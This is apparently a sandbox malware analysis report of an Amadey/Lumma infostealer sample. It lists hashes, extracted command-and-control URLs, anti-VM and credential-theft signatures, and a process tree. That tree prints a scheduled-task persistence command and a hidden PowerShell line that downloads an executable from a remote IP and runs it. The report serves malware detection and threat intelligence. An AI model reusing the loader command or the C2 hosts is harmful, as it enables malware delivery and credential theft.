Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
161s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14/03/2025, 04:43
Static task
static1
Behavioral task
behavioral1
Sample
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource
win10v2004-20250313-en
General
-
Target
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
-
Size
938KB
-
MD5
23abb2c0ef0f3dc30270a9afd6b27530
-
SHA1
aa4fd27820b03a511ebac7b3ee05a95dce3c2c52
-
SHA256
853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373
-
SHA512
2f194dea83725bf08837c0ac938efaf015a079f7c59f90e770efec2553f75e2e2cedf899575e5b9194a7b99378177194302cbb2acc9f80557dce5eace5216b8d
-
SSDEEP
24576:5qDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:5TvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://kbracketba.shop/api
https://featureccus.shop/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
Signatures
-
Amadey family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b418752ed2.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2336 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2336 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 4 2336 powershell.exe 7 844 rapes.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b418752ed2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b418752ed2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE -
Executes dropped EXE 3 IoCs
pid Process 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 844 rapes.exe 2180 b418752ed2.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine b418752ed2.exe -
Loads dropped DLL 3 IoCs
pid Process 2336 powershell.exe 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 844 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 844 rapes.exe 2180 b418752ed2.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b418752ed2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 316 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 844 rapes.exe 2180 b418752ed2.exe 2180 b418752ed2.exe 2180 b418752ed2.exe 2180 b418752ed2.exe 2180 b418752ed2.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2336 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2876 wrote to memory of 2364 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 31 PID 2876 wrote to memory of 2364 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 31 PID 2876 wrote to memory of 2364 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 31 PID 2876 wrote to memory of 2364 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 31 PID 2876 wrote to memory of 2396 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 32 PID 2876 wrote to memory of 2396 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 32 PID 2876 wrote to memory of 2396 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 32 PID 2876 wrote to memory of 2396 2876 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 32 PID 2364 wrote to memory of 316 2364 cmd.exe 34 PID 2364 wrote to memory of 316 2364 cmd.exe 34 PID 2364 wrote to memory of 316 2364 cmd.exe 34 PID 2364 wrote to memory of 316 2364 cmd.exe 34 PID 2396 wrote to memory of 2336 2396 mshta.exe 35 PID 2396 wrote to memory of 2336 2396 mshta.exe 35 PID 2396 wrote to memory of 2336 2396 mshta.exe 35 PID 2396 wrote to memory of 2336 2396 mshta.exe 35 PID 2336 wrote to memory of 2884 2336 powershell.exe 37 PID 2336 wrote to memory of 2884 2336 powershell.exe 37 PID 2336 wrote to memory of 2884 2336 powershell.exe 37 PID 2336 wrote to memory of 2884 2336 powershell.exe 37 PID 2884 wrote to memory of 844 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 38 PID 2884 wrote to memory of 844 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 38 PID 2884 wrote to memory of 844 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 38 PID 2884 wrote to memory of 844 2884 Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE 38 PID 844 wrote to memory of 2180 844 rapes.exe 40 PID 844 wrote to memory of 2180 844 rapes.exe 40 PID 844 wrote to memory of 2180 844 rapes.exe 40 PID 844 wrote to memory of 2180 844 rapes.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:316
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE"C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Users\Admin\AppData\Local\Temp\10206880101\b418752ed2.exe"C:\Users\Admin\AppData\Local\Temp\10206880101\b418752ed2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD53321797daf023e3d8c99b833bcebe058
SHA11bee929772b85bc04e790455d816736f8c8b46c2
SHA2563938663fc81b2f8aafe2ad8b2eb4ce1e671a2260437a19aebd9830f5b0818d0c
SHA5124685b8962f400c40821e92ca2f6385c19b80ded649f8c171f0c780ec2c511a5cbab398c49370e69fec3baf11b0ad05ede428017d9b226ab3f0e3f423538e8fb7
-
Filesize
717B
MD51231858a870049ae4d76a8166f90551c
SHA158233a05e024ef11dc121dd4da91cb54a466ff7f
SHA2560ed2e67d5d1b95b0bf7e58c3d2ade7c7651b68e674cab0d1f24c002a5bb63768
SHA512852fe05e35d4ca5c249a10dc37ba611702e54e9791ea94ced88cf4658a6d3387616385ddb18a28d8c22957512488a4dd5c63187f18a5ee9778b0a91c47965833
-
Filesize
2.1MB
MD50a292f073a6184fed639e127c134fc6e
SHA1dc2af660616616c531ad1e2f960aa86c615d6072
SHA256d9ae087614383e661306c3c77f6186feb9100f6d0a5b33c2f6d72348280af763
SHA5120b6181b42d037d12c56e390dccb2c7b2f8c9d6ca808a7f35ba96322d87c1d56924ad60afa02a873324ceda2691d2be494a88a63fdc43c95467676b02fdbb5e52